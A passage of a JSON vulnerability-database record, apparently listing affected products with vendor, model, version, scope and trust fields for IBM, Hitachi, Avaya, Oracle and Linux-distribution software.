0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "cosminexus developer light 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "jrockit r27.6.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jrockit r27.6.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.52" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "sterling secure proxy ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "cosminexus client 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.10" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "ucosminexus client 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "web sphere real time service refresh", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "37" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "cosminexus developer professional 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.33" }, { "model": "cosminexus developer 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-00" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0" }, { "model": "manager", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "111.7" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.29" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.37" }, { "model": "java se embedded 7u45", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus application server 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.061" }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.41" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.42" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.2" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cosminexus application server 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational sap connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.4" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.19" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "cosminexus studio 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.9" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "cosminexus application server enterprise 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.05" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.55" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.01" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.06" }, { "model": "runtimes for java technology 7.sr7", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer light 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v07" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.15" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.2" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "cosminexus developer professional 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "sterling external authentication server patch ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.11103" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server standard 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus application server standard 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "soap gateway component of the ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "filenet content manager ga", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1" }, { "model": "cosminexus developer standard 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": 